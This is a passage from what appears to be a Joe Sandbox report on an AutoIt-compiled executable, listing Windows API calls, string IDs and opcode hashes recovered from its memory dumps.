                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                • Opcode ID: 947c7f8642ad9866c01d330701340da41102521c1e6da6f487cfe699ed890afc
                                                                                                                                                                                                                                                                • Instruction ID: 1b9463302de2485d3907a102fffbfdd6c914e729aa7d7b7fde63a429195b95c5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 947c7f8642ad9866c01d330701340da41102521c1e6da6f487cfe699ed890afc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2116A316042419FD710DF2AD484A1ABBE6AF85328F14C69DF4698B6A2CB34EC05CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • BlockInput.USER32(00000001), ref: 006EEABD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BlockInput
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                • Opcode ID: fad790f1eedf0c97eec1df6c1d2801c7f9b7f122c009dbc64d81dec9eaf2fc94
                                                                                                                                                                                                                                                                • Instruction ID: 45ac511ce3d4a0d1413732f225b13d166eacafc852b1020274d23a73c4bd95a6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fad790f1eedf0c97eec1df6c1d2801c7f9b7f122c009dbc64d81dec9eaf2fc94
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36E01A312002049FD710EF6AD804E9AB7EAAF98764F00C42AFC49C7391DB75A8418B94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,006903EE), ref: 006909DA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                • Opcode ID: fee48fc4bb3d385b3742698177ea594db40dbc20c562a15dca8d526a750de7de
                                                                                                                                                                                                                                                                • Instruction ID: d2c6353d11635bc6c6f2afbf2921a28eac48b3cf7e29d5e049570d608fc08f07
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fee48fc4bb3d385b3742698177ea594db40dbc20c562a15dca8d526a750de7de
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 006F2B30
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 006F2B43
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 006F2B52
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 006F2B6D
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 006F2B74
                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 006F2CA3
                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 006F2CB1
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006F2CF8
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 006F2D04
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006F2D40
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006F2D62
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006F2D75
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006F2D80
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 006F2D89
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006F2D98
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 006F2DA1
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006F2DA8
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 006F2DB3
                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006F2DC5
                                                                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0070FC38,00000000), ref: 006F2DDB
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 006F2DEB
                                                                                                                                                                                                                                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 006F2E11
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 006F2E30
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006F2E52
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006F303F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                • Opcode ID: 1ade0377f288c2048322b36008c67b5e41035751701883a41b1b10854ffb0b84
                                                                                                                                                                                                                                                                • Instruction ID: 0f00116804fe1d30e79d9c51df982502eeb2e4742594fa67a58e7ff4abc2e69b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ade0377f288c2048322b36008c67b5e41035751701883a41b1b10854ffb0b84
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41028C71500209EFDB15DFA4CC89EAE7BBAFB49714F008258F915AB2A1DB74AD01CF64
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?), ref: 00688E14
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 006C6AC5
                                                                                                                                                                                                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006C6AFE
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006C6F43
                                                                                                                                                                                                                                                                  • Part of subcall function 00688F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00688BE8,?,00000000,?,?,?,?,00688BBA,00000000,?), ref: 00688FC5
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001053), ref: 006C6F7F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006C6F96
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 006C6FAC
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 006C6FB7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: d170739995704483a597b7aacaabb31daf33ffabfe69df646786994baee41b59
                                                                                                                                                                                                                                                                • Instruction ID: f988ef7456915119be41adc5b25143620da2f5b67fa974698144abb4eaf252b4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d170739995704483a597b7aacaabb31daf33ffabfe69df646786994baee41b59
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76128A34204241DFDB25EF14C848FB5B7A6FB49300F94866EF5958B261CB35EC92CB99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 006F273E
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006F286A
                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 006F28A9
                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 006F28B9
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 006F2900
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 006F290C
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 006F2955
                                                                                                                                                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006F2964
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 006F2974
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 006F2978
                                                                                                                                                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 006F2988
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006F2991
                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 006F299A
                                                                                                                                                                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006F29C6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 006F29DD
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 006F2A1D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006F2A31
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 006F2A42
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 006F2A77
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 006F2A82
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006F2A8D
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 006F2A97
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                • Opcode ID: 696f3e0107f4fc7b76ac07c2351ef2b14acd9523eb28f22d6df584193ee07d2d
                                                                                                                                                                                                                                                                • Instruction ID: 35ed174138669326dddc4491227292bb579106d225a59dbbcebefca7269b22d0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 696f3e0107f4fc7b76ac07c2351ef2b14acd9523eb28f22d6df584193ee07d2d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11B15FB5A40209AFEB14DF68CC45FAE7BA9EB05710F108255FA14E7290DB74ED40CB94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 006E4AED
                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,0070CB68,?,\\.\,0070CC08), ref: 006E4BCA
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,0070CB68,?,\\.\,0070CC08), ref: 006E4D36
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                • Opcode ID: c7e6caea054d39fba99a6d7fc18fb41c87f8d5b3d1fcf8a0facc0f1bcca0d96e
                                                                                                                                                                                                                                                                • Instruction ID: b188f6abcccd14c55385fd8d1d9e04df31f4f0fc1e9dd5011be44d9d4b8afc6c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7e6caea054d39fba99a6d7fc18fb41c87f8d5b3d1fcf8a0facc0f1bcca0d96e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37618F70707385ABDB04DF35C9829A977A2AB04B00B34C519F80AAB792DF29ED42DB55
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00701128
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0070113D
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00701144
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00701199
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 007011B9
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007011ED
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0070120B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0070121D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 00701232
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00701245
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 007012A1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007012BC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007012D0
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 007012E8
                                                                                                                                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 0070130E
                                                                                                                                                                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00701328
                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0070133F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 007013AA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                • Opcode ID: 20895521438700935bae97159d7ecc6596d2146e130dcf14b68f99af15ef36bc
                                                                                                                                                                                                                                                                • Instruction ID: eac9baa84f8ec238a7903e951229ccf19310ddb58f817442a7291fa91a529a1c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20895521438700935bae97159d7ecc6596d2146e130dcf14b68f99af15ef36bc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CB19A71604341EFD714DF64C884B6ABBE5FF84704F408A1CF9999B2A1DB35E844CBA6
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00688968
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00688970
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0068899B
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 006889A3
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 006889C8
                                                                                                                                                                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006889E5
                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006889F5
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00688A28
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00688A3C
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 00688A5A
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00688A76
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00688A81
                                                                                                                                                                                                                                                                  • Part of subcall function 0068912D: GetCursorPos.USER32(?), ref: 00689141
                                                                                                                                                                                                                                                                  • Part of subcall function 0068912D: ScreenToClient.USER32(00000000,?), ref: 0068915E
                                                                                                                                                                                                                                                                  • Part of subcall function 0068912D: GetAsyncKeyState.USER32(00000001), ref: 00689183
                                                                                                                                                                                                                                                                  • Part of subcall function 0068912D: GetAsyncKeyState.USER32(00000002), ref: 0068919D
                                                                                                                                                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,006890FC), ref: 00688AA8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                • Opcode ID: 5a2269d1d72d0ed81502d0ab0458222897edf5788aee94cc24627e9fde7d8d75
                                                                                                                                                                                                                                                                • Instruction ID: e292f0fe049c92a77113830cafe8063d66d9b63c768a3dd094945118f36f81da
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a2269d1d72d0ed81502d0ab0458222897edf5788aee94cc24627e9fde7d8d75
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CB15D75A00209DFDF14EF68CC45BEE3BB6FB48314F508229FA15AB290DB74A841CB59
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 006D10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006D1114
                                                                                                                                                                                                                                                                  • Part of subcall function 006D10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,006D0B9B,?,?,?), ref: 006D1120
                                                                                                                                                                                                                                                                  • Part of subcall function 006D10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006D0B9B,?,?,?), ref: 006D112F
                                                                                                                                                                                                                                                                  • Part of subcall function 006D10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006D0B9B,?,?,?), ref: 006D1136
                                                                                                                                                                                                                                                                  • Part of subcall function 006D10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006D114D
                                                                                                                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006D0DF5
                                                                                                                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006D0E29
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 006D0E40
                                                                                                                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 006D0E7A
                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006D0E96
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 006D0EAD
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 006D0EB5
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 006D0EBC
                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006D0EDD
